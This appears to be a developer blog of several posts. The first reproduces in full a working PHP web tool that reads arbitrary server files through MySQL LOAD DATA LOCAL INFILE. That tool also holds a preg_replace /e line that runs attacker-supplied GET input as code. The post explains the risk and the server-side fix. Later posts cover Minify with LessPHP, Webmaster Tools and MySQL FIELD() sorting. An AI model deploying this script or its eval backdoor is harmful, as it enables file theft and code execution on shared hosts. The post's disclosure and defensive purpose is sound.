Yesterday I stumbled on a piece of code shown me by my friend Andrea Guglielmo.

It is an exploit that could affect mostly shared hosting solutions, and which I’ve never seen before, even if it has not been invented recently.

It is not really well written piece of PHP code:

• you can immediately notice that it requires ini_set('short_open_tag', true);
• it is vulnerable to sql injections
• it allows arbitrary MySQL credentials (username, password and database) to be passed in via $_GET

But this is not the point of the discussion.

Let’s first get our eyes on it:

<?
$mysql_host = (isset($_GET[mysql_host]))?$_GET[mysql_host]:"localhost";
$mysql_user = (isset($_GET[mysql_user]))?$_GET[mysql_user]:"";
$mysql_pass = (isset($_GET[mysql_pass]))?$_GET[mysql_pass]:"";
$calcname = explode(".",getenv("HTTP_HOST"));
$mysql_name =(isset($_GET[mysql_name]))?$_GET[mysql_name]:"my_".$calcname[0];
$mysql_xploit = preg_replace("/(.+)/e", $_GET[db], $_GET[db]);
$path = (isset($_GET[path]))?$_GET[path]:"/membri/SITO/config.php";
$limit = (isset($_GET[limit]))?$_GET[limit]:"0,30";
$search = (isset($_GET[search]))?$_GET[search]:"";
?>
<form action="#" method="GET">
host <input type=text name=mysql_host value='<?=$mysql_host;?>'/><br />
user <input type=text name=mysql_user value='<?=$mysql_user;?>'/><br />
pass <input type=text name=mysql_pass value='<?=$mysql_pass;?>'/><br />
name <input type=text name=mysql_name value='<?=$mysql_name;?>'/><br />
path <input type=text name=path value='<?=$path;?>' /><br />
[ limit <input type=text name=limit value='<?=$limit;?>' /> ]<br />
[ search <input type=text name=search value='<?=$search;?>' /> ]<br />
<input type=submit value=send />
</form>
<?

if (isset($_GET[mysql_host])) {
  $search = $_GET[search];
  $link = mysql_connect($_GET['mysql_host'], $_GET['mysql_user'], $_GET['mysql_pass'])or die(mysql_error());
  $db = mysql_select_db($_GET['mysql_name']);
  $path = $_GET['path'];
  $limit = $_GET['limit'];
  $query = "CREATE TABLE `exploit` (`path` longtext not null);";
  $delete =  "DROP TABLE `exploit`;";
  $bypass = "LOAD DATA LOCAL INFILE '$path' INTO TABLE exploit;";
  $l = (!empty($_GET[limit])) ? " LIMIT $limit" : "";
  $fu = "SELECT * FROM exploit".$l;
  mysql_query($delete);
  mysql_query($query)or die(mysql_error());
  mysql_query($bypass)or die("Mysql-exploit-error : ".mysql_error());
  $res = mysql_query($fu)or die(mysql_error());
  $txt = "";
  while($row = mysql_fetch_array($res)) {
    $txt .= $row[path]."\n";
  }
  $output = "<form action=# method=POST><input type=hidden name=mode value=sqlwritefile>
  <textarea rows=30 cols=100 name=newtext>".htmlspecialchars($txt)."</textarea></form>";
}

if (!empty($search)) {
  $q = "SELECT * FROM exploit WHERE path LIKE '%".$search."%'";
  $result = mysql_query($q)or die("Mysql-exploit-error : ".mysql_error());
  $txt2 = "";
  while($riga = mysql_fetch_assoc($result)) {
    $txt2 .= $riga[path];
  }
  $output .= "Search results: <form action=# method=POST><input type=hidden name=mode value=sqlwritefile>
  <textarea rows=30 cols=100 name=newtext>".htmlspecialchars($txt2)."</textarea></form>";
}
echo $output;
?>

So here’s what it does:

1. connects to a MySQL database
2. creates a table called “exploit“
3. loads data from an arbitrary path passed in by $_GET['path']
4. Allows querying for data

So you could ask me: Marco, what’s the problem? We already do that with file_get_contents($path).

The problem is that MySQL is a service running on it’s own. Usually, your PHP process is “jailed” within the limits of the www-data user or the one that suPHP has provided you…
I’m thinking of a standard Debian installation, where MySQL usually runs under user “mysql”, which has access to some interesting stuff, like /var/log/mysql.err, /var/log/mysql.log.*, /var/log/mysql/* and /var/lib/mysql/*, and this without considering all what the privileges of the user “mysql” implies.

So what about copying an entire log file or binlog file into the “exploit” table and displaying it to anonymous evil h4x0r? Creepy…

Here’s a sample I’ve just tested:

mysql> create database exploittest;
Query OK, 1 row affected (0.00 sec)
mysql> use exploittest;
Database changed
mysql> CREATE TABLE `exploit` (`path` longtext not null);
Query OK, 0 rows affected (0.01 sec)

mysql> LOAD DATA LOCAL INFILE '/var/lib/mysql/test.txt' INTO TABLE exploit;
Query OK, 3 rows affected (0.05 sec)
Records: 3 Deleted: 0 Skipped: 0 Warnings: 0

mysql> select * from exploit;
+--------+
| path |
+--------+
| aaaa |
| bbbbb |
| cccccc |
+--------+
3 rows in set (0.00 sec)

Well, there’s a simple solution you SHOULD adopt if you have any customers with access to PHP code on your server. Here’s what the MySQL manual states:

You can disable all LOAD DATA LOCAL statements from the server side by starting mysqld with the –local-infile=0 option.

You can could read more about it here:

MySQL LOAD DATA LOCAL INFILE.

Always remember that security is NEVER enough!

Today I’ve been working on some addition to the Minify Project to support LESS CSS integration throug LessPHP.

Why do I need LESS CSS?

As you probably have noticed, your CSS files are becoming huge, especially when working on great projects, avoiding sprites, adding gradients, box-shadows, animations, keyframes, etc:

That’s where LESS CSS comes into play.
LESS CSS is just another way of writing CSS, not that repetitive and “LESS” confusing in big projects.

Why do I need Minify?

Minify is a great tool for CSS compression on complex design projects, where you have more designers and dozens of different widgets to be styled individually, but without making the website slow and unresponsive, keeping it fast and slick.

So what was missing?

I’ve been working with Minify JS and CSS for some years till now, but once I switched to LESS I decided to stop writing all my CSS by hand.
Repeating css rules and all those vendor-prefixes for properties made me mad! This brought me to the usage of the Less App for Mac OS, but also forced me to repeat a painful compile/redeploy procedure every time, most of the times automated with complex scripts that made the procedure even more confusing for my design team.

Minify was not able to pack and manage my LESS CSS files.

So what does this Minify LessPHP/LessCSS integration do?

I didn’t even believe I could make it in such a short time, just a bit of planning an an hour of coding+debugging, but now I have a working Minify instance using “.less” files and automagically compiling through LessPHP and minifying them.

You can find my project on it’s GitHub page for LessCSS and Minify Integration.
If you’re familiar with Minify, just go on, download the package, change your config.php settings and try it out!
You just need to include .less files instead of .css ones in your requests/groupsConfig!

Setting up Minify with LessCSS support

If you’re not familiar with the project, here’s a very fast introduction:

1. Download the current GitHub Repository Contents for the LessCSS LessPHP Minify integration
2. Unzip the file to a directory of your website/local web server
3. Locate a file called “config.php” in the “min” directory and open it with your favourite text editor.
4. Find a line that states (should be at line 57, like you see it here)

       $min_documentRoot = '';

   and change it with

       $min_documentRoot = dirname(__FILE__);

5. Put some “.less” files in the “min” directory, like the following (I’m calling it “test.less”):

   @color: #4D926F;
   
   #header {
     color: @color;
   }
   h2 {
     color: @color;
   }

6. Load the webpage at http://yoursite/path/to/min/?f=test.less, you should get an output similar to:

   #header{color:#4d926f}h2{color:#4d926f}

7. Go to the Minify Documentation site and continue experimenting!

After all, this is Minify… More or LESS

As you probably noticed yesterday, Google released some very interesting and new features for his very useful Webmaster Tools utility…
Before the change, to view variations in the Search Queries Webmaster Tools and evaluate your result in SERPs, you had to work it out with the fantastic, but not so much user friendly Webmaster Tools API. Not that useful if you’re not a Geek, a Zend_GData or a Java/Java Web developer…
You now just have to click on the “Your site on the web” > “Search Queries” tab in your browser…
Here’s the result:

Google makes SEO easier with some new features added to Webmaster Tools!

As you can see, we now have 9 sorting features instead of 5
Very useful to see if you’re doing SEO the right way (just sort your results by their Average Position in SERPs), or if the period for a search term is not the right one (to be compared with Google Insights).
You can take a look at the impressions count change, to see if you can get some more visitors from Search Engines for a certain Keyword on which you should focus on because it is trending right now. Otherwise you can just leave the SEO work you’re doing on some key words because it is no more a trend!
This is surely going to change the way SEO experts works on positioning optimization (don’t tell me it’s not an affidable tool… It works great, also if displayed values are only relative! Everyone out there who’s not a developer should find these features vital for their success in SEO!)
That’s not all, we’ve not finished yet!
There’s more for web developers!
You probably didn’t notice it, but if you take a look at the “Site configuration” > “Settings” > “Parameter handling” tab in your Webmaster Tools, then you’ll notice that you can now decide what parameters google should use for your urls containing GET parameters! Great, I’ll no more get duplicate content from wrong in-site-search results being crawled by Google!
That’s very useful for developers too lazy to implement the Canonical meta-tag for their websites ^_^
If you want to discover more, you can find out great news on the Google Official Webmaster Central Blog…

Good luck and have fun!

Today I was facing troubles with the administrative dept of the web agency where I’m working in… They wanted to have their receiptive structures sorted by a custom role…

What I first thought about was a MySQL Union query where I had to fetch all distinct types of receiptive structures (Hotels, B&Bs, Campings, etc…) in the desired order in different parametrized queries… Something like the following:

(
  SELECT
    1 as sorting_column,
    *
  FROM receiptive_structures
  WHERE type_id=4
) AS a
UNION ALL
(
  SELECT
    2 as sorting_column,
    *
  FROM receiptive_structures
  WHERE type_id=2
) AS b
UNION ALL
(
  SELECT
    3 as sorting_column,
    *
  FROM receiptive_structures
  WHERE type_id=7
) AS c
UNION ALL
(
  SELECT
    4 as sorting_column,
    *
  FROM receiptive_structures
  WHERE type_id=1
) AS d
ORDER BY sorting_column ASC

Althrough the ‘sorting_column’ shouldn’t be necessary, I had too many bad experiences with mysql and its sorting features (expecially when merging together resultsets, like in this case).

Nasty solution…
I decided to continue looking for a more elegant way of doing this…

I decided to use some kind of on-the-fly generated function in the ORDER BY clause of my MySQL Custom Sorting Query:

SELECT
((type_id=4)*1
+(type_id=2)*2
+(type_id=7)*3
+(type_id=1)*4) AS sorting_column,
r.*
FROM receiptive_structures AS r
ORDER BY sorting_column ASC

Still looks ugly…
Digging into the MySQL manual, found out that there’s a faster way of doing that!

SELECT * FROM receiptive_structures
ORDER BY FIELD(priority, 4,2,7,1);

And here’s a quick overview of the MySQL FIELD() “weight” function

Database changed
mysql> select id, FIELD(id,4,2,7,1) AS sorting
    -> FROM l10n ORDER BY sorting DESC limit 5;
+----+---------+
| id | sorting |
+----+---------+
|  1 |       4 |
|  7 |       3 |
|  2 |       2 |
|  4 |       1 |
|  3 |       0 |
+----+---------+
5 rows in set (0.00 sec)

I hope this will be useful for you

Hello there, and welcome to my first post!

This website will be my toolbox containing tools, tips and tricks about web development, my story and all the troubles of a web developer who starts becoming a very angry developer…..

I’m really sorry to present it as a WordPress blog, but I didn’t have any time to work on a new application written in J2EE or Zend Framework…

I hope that you will like it anyway, as I’m going to work hard on it and on it’s template (which is the WordPress default theme at the time I’m writing this post).